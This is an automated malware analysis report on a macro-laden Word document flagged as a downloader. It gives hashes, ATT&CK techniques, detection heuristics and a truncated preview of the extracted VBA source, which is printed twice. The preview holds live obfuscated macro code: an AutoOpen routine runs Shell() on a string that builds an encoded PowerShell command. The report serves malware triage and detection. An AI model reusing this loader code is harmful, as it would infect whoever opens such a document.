Office (OLE) malware analysis — malicious · 96d4e7863fa8741f

MALICIOUS

Office (OLE)

104.2 KB Created: 2018-06-11 13:46:00 Authoring application: Microsoft Office Word First seen: 2018-07-14

MD5: 3a6dd2fc04f56755adecf8b41ab54b27 SHA-1: cdebb3bda1477ab713c2df6eba25f624a8923653 SHA-256: 96d4e7863fa8741f84d1ee5b5358fd65af2e042311c4708bcc87da28dbbaceb1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a second-stage payload using the Shell() function. The ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' strongly suggests a downloader functionality.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11101 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11101 bytes
SHA-256: `25c759c649ef187dc8c79b64c6c78082c931d495057120548d4215c991b06c82`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "XTpBcmRzpR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function CVIvjTsH() On Error Resume Next nGkZO = CLng(88679 * CSng(NdIPKc + ChrB(umoOb + CInt(390)))) LCkXV = Int(TsiRki) jRTnzR = OBGVmt QCLpD = ubDzBt MVuqf = zRdSBP OJJwP = bmDpXc CkHNTl = CLng(11797 * CSng(ZsGPq + ChrB(vonkJ + CInt(50829)))) NkRHkQ = Int(PJjXO) dNJPwQ = tpQDj ifzPF = Bopzp jUnAQ = jBsci XlsRzX = ObLmm CVIvjTsH = bvqUYB + Shell(PErvNWZ + Chr(nVkDNzAnG + vbKeyP + RpTXcRuz) + "owers" + AzlDTiqBI + iwforpUi + QuhVXCzZJdY + zozHmPvK + bCwOiwjWrtu, 53622 - 53622) tbJMJ = CLng(76423 * CSng(TJPwU + ChrB(YDTfjB + CInt(94207)))) rTVko = Int(fbfXi) iWlao = pULOWw FwQvvi = pwBHnc Visir = TKCRt wMcHdz = niTOf End Function Sub Autoopen() On Error Resume Next tzLjVi = CLng(73730 * CSng(NTmSk + ChrB(icvwwB + CInt(9872)))) YNrYJO = Int(mCTMvw) IahnH = lsppsS KnWPii = YwswU WaQSF = jRUUPL avfXCf = YdwjEi CVIvjTsH lsJik = CLng(36657 * CSng(IKcWjD + ChrB(ZqTGEj + CInt(7729)))) taqQd = Int(sckOWY) ZKmisK = kDBSc znfZA = MTwjrU kPhrIM = rzfhbL mjqYX = YzFzKO End Sub Attribute VB_Name = "LbaauKCZCC" Function AzlDTiqBI() On Error Resume Next SKPKw = CLng(67149 * CSng(SlwrXG + ChrB(FpZcj + CInt(96366)))) OPfsm = Int(QsXHZ) dRmzD = qKzELb pRnfw = HCuEv SJLjaO = RzctSr spnXK = DVwFc bAbtI = "HeLL -e" + " J" + "gAgACg" + "AIAAkAHMAaA" + "BFAGwATABJAG" + "QAWwAxAF" + "0AK" bFSVi = CLng(24863 * CSng(NkafbY + ChrB(UJWMYV + CInt(76796)))) JROXt = Int(jzNFGO) mziujb = lRKMwU uwkhHY = vAGLT jnNZU = DhKsS tKnsHC = ZHmwc ETviXBnK = "wAkAHMASABFA" + "Gw" + "ATABpA" + "GQAWwAxADMAX" + "QArACcAeAA" + "nACkAKAAgAE4A" + "ZQ" + "B3A" + "C0" + "Abw" wpkrw = CLng(44689 * CSng(NawwEk + ChrB(nQBjGS + CInt(81399)))) OODtE = Int(tsupkB) VTqMV = iSNpnW lIFDr = hkaWn SwTiC = TjVRz WkjMv = YPXtA CBiEZXaV = "BiAGoARQBj" + "AFQAIAAgAE" + "kATwAuAGMAbwBt" + "AHAAcg" + "BFAFMAUwB" + "pAE8ATgAuAEQAR" nrzaTl = CLng(90522 * CSng(CHCnKk + ChrB(jUmpT + CInt(20822)))) jGbVpY = Int(YhZvhu) LsPjW = HPivB qsvlD = asKqzw WAiacr = pzUbWF KmRYfT = iEdvWO IbjDH = "QBGAEwAYQB0" + "AEUAcwBUAHI" + "AZQBBAE0AKAB" + "bAGkAb" + "wAuAE0ARQBNA" + "G8AUgB5AH" + "MAdABSAGUAY" + "QBNAF0AWwBDAG8A" + "TgBWAGUAUgB0AF" + "0AOgA6A" BAUtR = CLng(77578 * CSng(zdoFD + ChrB(UrYUO + CInt(95192)))) QGtSUi = Int(ovAiG) VnzzhF = wKIcS uKqjJh = irvGC mXMEc = zaDjr mJfnF = RzsjFz GPOHwiq = "EYAUgB" + "vAG0AYgBhAFMA" + "ZQA2" + "ADQAU" + "wBUAHIASQBOA" + "GcAKAAnAFYAWgB" rzhzi = CLng(84837 * CSng(wIStkG + ChrB(SSBqiw + CInt(14683)))) Ysrlw = Int(CjDSPo) MSbZow = irmDwQ jrtbwI = YoHst ubPbV = vFAZR zjshGo = hpVpJr DqnawLAtw = "CAHYAVAA4A" + "EoAQQ" + "BEAE0AY" + "QAvAHkAcgAxA" + "FkA" + "cw" + "BoAEgAZABEAF" jQodT = CLng(63543 * CSng(uhCbLi + ChrB(VtfRbk + CInt(97214)))) criTFL = Int(YmFjE) fRXGkv = wpFuG MwpXh = SEnwv bjjJQW = duqcIL ptdmmn = zzSiO iTuwKTwUt = "IA" + "RQAwA" + "HMA" + "SgB" cmhrU = CLng(53789 * CSng(ILZpZ + ChrB(TcKVTh + CInt(22660)))) RYaBKI = Int(bjOaBz) rNzIjF = dUnNDU odwADh = NGpJT hcLOX = UlzWLA HnEmo = oBmFP DLntl = "pAGcAaQ" + "BJAEkAUgBJAF" + "IAawBHAE4AQw" + "BiAG0" + "ARwBJAFUAZAA3A" + "E8ANwBtAHIAZAB" AzlDTiqBI = bAbtI + ETviXBnK + CBiEZXaV + IbjDH + GPOHwiq + DqnawLAtw + iTuwKTwUt + DLntl End Function Function iwforpUi() On Error Resume Next wSndG = CLng(17887 * CSng(MlABJZ + ChrB(TAzrHm + CInt(480)))) ZYITBB = Int(SvWvoY) jHrMN = VGlvNw oBvwdZ = sOUmH hSFfNk = CTrzu MbTmN = DNrRA UJwYlv = "2ADQ" + "ARQA3ADYANw" + "BoADAANABTADMAe" + "gB" + "SAHA" + "AbgAxAC" SPWYR = CLng(75667 * CSng(FQGCB + ChrB(ichlU + CInt(18456)))) DDNaZc = Int(jDiqB) HvVud = EvpIG SjfdV = WHFUOB zpjYBh = BvwmH ITFzOv = CHwcC WZanjrm = "8ANwB" + "0AEwAV" + "QA2AFAA" + "SAA4AFYAagArA" + "FMARw" GTtznj = CLng(38156 * CSng(iMYWnb + ChrB(XWhsWi + CInt(38666)))) CFFTu = Int(rsDWTa) IwLFnp = HjdaTQ lPj ... (truncated)

SHA-256: 25c759c649ef187dc8c79b64c6c78082c931d495057120548d4215c991b06c82

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "XTpBcmRzpR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CVIvjTsH()
On Error Resume Next
nGkZO = CLng(88679 * CSng(NdIPKc + ChrB(umoOb + CInt(390))))
LCkXV = Int(TsiRki)
jRTnzR = OBGVmt
QCLpD = ubDzBt
MVuqf = zRdSBP
OJJwP = bmDpXc
CkHNTl = CLng(11797 * CSng(ZsGPq + ChrB(vonkJ + CInt(50829))))
NkRHkQ = Int(PJjXO)
dNJPwQ = tpQDj
ifzPF = Bopzp
jUnAQ = jBsci
XlsRzX = ObLmm
CVIvjTsH = bvqUYB + Shell(PErvNWZ + Chr(nVkDNzAnG + vbKeyP + RpTXcRuz) + "owers" + AzlDTiqBI + iwforpUi + QuhVXCzZJdY + zozHmPvK + bCwOiwjWrtu, 53622 - 53622)
tbJMJ = CLng(76423 * CSng(TJPwU + ChrB(YDTfjB + CInt(94207))))
rTVko = Int(fbfXi)
iWlao = pULOWw
FwQvvi = pwBHnc
Visir = TKCRt
wMcHdz = niTOf
End Function
Sub Autoopen()
On Error Resume Next
tzLjVi = CLng(73730 * CSng(NTmSk + ChrB(icvwwB + CInt(9872))))
YNrYJO = Int(mCTMvw)
IahnH = lsppsS
KnWPii = YwswU
WaQSF = jRUUPL
avfXCf = YdwjEi
CVIvjTsH
lsJik = CLng(36657 * CSng(IKcWjD + ChrB(ZqTGEj + CInt(7729))))
taqQd = Int(sckOWY)
ZKmisK = kDBSc
znfZA = MTwjrU
kPhrIM = rzfhbL
mjqYX = YzFzKO
End Sub


Attribute VB_Name = "LbaauKCZCC"
Function AzlDTiqBI()
On Error Resume Next
SKPKw = CLng(67149 * CSng(SlwrXG + ChrB(FpZcj + CInt(96366))))
OPfsm = Int(QsXHZ)
dRmzD = qKzELb
pRnfw = HCuEv
SJLjaO = RzctSr
spnXK = DVwFc
bAbtI = "HeLL -e" + " J" + "gAgACg" + "AIAAkAHMAaA" + "BFAGwATABJAG" + "QAWwAxAF" + "0AK"
bFSVi = CLng(24863 * CSng(NkafbY + ChrB(UJWMYV + CInt(76796))))
JROXt = Int(jzNFGO)
mziujb = lRKMwU
uwkhHY = vAGLT
jnNZU = DhKsS
tKnsHC = ZHmwc
ETviXBnK = "wAkAHMASABFA" + "Gw" + "ATABpA" + "GQAWwAxADMAX" + "QArACcAeAA" + "nACkAKAAgAE4A" + "ZQ" + "B3A" + "C0" + "Abw"
wpkrw = CLng(44689 * CSng(NawwEk + ChrB(nQBjGS + CInt(81399))))
OODtE = Int(tsupkB)
VTqMV = iSNpnW
lIFDr = hkaWn
SwTiC = TjVRz
WkjMv = YPXtA
CBiEZXaV = "BiAGoARQBj" + "AFQAIAAgAE" + "kATwAuAGMAbwBt" + "AHAAcg" + "BFAFMAUwB" + "pAE8ATgAuAEQAR"
nrzaTl = CLng(90522 * CSng(CHCnKk + ChrB(jUmpT + CInt(20822))))
jGbVpY = Int(YhZvhu)
LsPjW = HPivB
qsvlD = asKqzw
WAiacr = pzUbWF
KmRYfT = iEdvWO
IbjDH = "QBGAEwAYQB0" + "AEUAcwBUAHI" + "AZQBBAE0AKAB" + "bAGkAb" + "wAuAE0ARQBNA" + "G8AUgB5AH" + "MAdABSAGUAY" + "QBNAF0AWwBDAG8A" + "TgBWAGUAUgB0AF" + "0AOgA6A"
BAUtR = CLng(77578 * CSng(zdoFD + ChrB(UrYUO + CInt(95192))))
QGtSUi = Int(ovAiG)
VnzzhF = wKIcS
uKqjJh = irvGC
mXMEc = zaDjr
mJfnF = RzsjFz
GPOHwiq = "EYAUgB" + "vAG0AYgBhAFMA" + "ZQA2" + "ADQAU" + "wBUAHIASQBOA" + "GcAKAAnAFYAWgB"
rzhzi = CLng(84837 * CSng(wIStkG + ChrB(SSBqiw + CInt(14683))))
Ysrlw = Int(CjDSPo)
MSbZow = irmDwQ
jrtbwI = YoHst
ubPbV = vFAZR
zjshGo = hpVpJr
DqnawLAtw = "CAHYAVAA4A" + "EoAQQ" + "BEAE0AY" + "QAvAHkAcgAxA" + "FkA" + "cw" + "BoAEgAZABEAF"
jQodT = CLng(63543 * CSng(uhCbLi + ChrB(VtfRbk + CInt(97214))))
criTFL = Int(YmFjE)
fRXGkv = wpFuG
MwpXh = SEnwv
bjjJQW = duqcIL
ptdmmn = zzSiO
iTuwKTwUt = "IA" + "RQAwA" + "HMA" + "SgB"
cmhrU = CLng(53789 * CSng(ILZpZ + ChrB(TcKVTh + CInt(22660))))
RYaBKI = Int(bjOaBz)
rNzIjF = dUnNDU
odwADh = NGpJT
hcLOX = UlzWLA
HnEmo = oBmFP
DLntl = "pAGcAaQ" + "BJAEkAUgBJAF" + "IAawBHAE4AQw" + "BiAG0" + "ARwBJAFUAZAA3A" + "E8ANwBtAHIAZAB"
AzlDTiqBI = bAbtI + ETviXBnK + CBiEZXaV + IbjDH + GPOHwiq + DqnawLAtw + iTuwKTwUt + DLntl
End Function
Function iwforpUi()
On Error Resume Next
wSndG = CLng(17887 * CSng(MlABJZ + ChrB(TAzrHm + CInt(480))))
ZYITBB = Int(SvWvoY)
jHrMN = VGlvNw
oBvwdZ = sOUmH
hSFfNk = CTrzu
MbTmN = DNrRA
UJwYlv = "2ADQ" + "ARQA3ADYANw" + "BoADAANABTADMAe" + "gB" + "SAHA" + "AbgAxAC"
SPWYR = CLng(75667 * CSng(FQGCB + ChrB(ichlU + CInt(18456))))
DDNaZc = Int(jDiqB)
HvVud = EvpIG
SjfdV = WHFUOB
zpjYBh = BvwmH
ITFzOv = CHwcC
WZanjrm = "8ANwB" + "0AEwAV" + "QA2AFAA" + "SAA4AFYAagArA" + "FMARw"
GTtznj = CLng(38156 * CSng(iMYWnb + ChrB(XWhsWi + CInt(38666))))
CFFTu = Int(rsDWTa)
IwLFnp = HjdaTQ
lPj
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.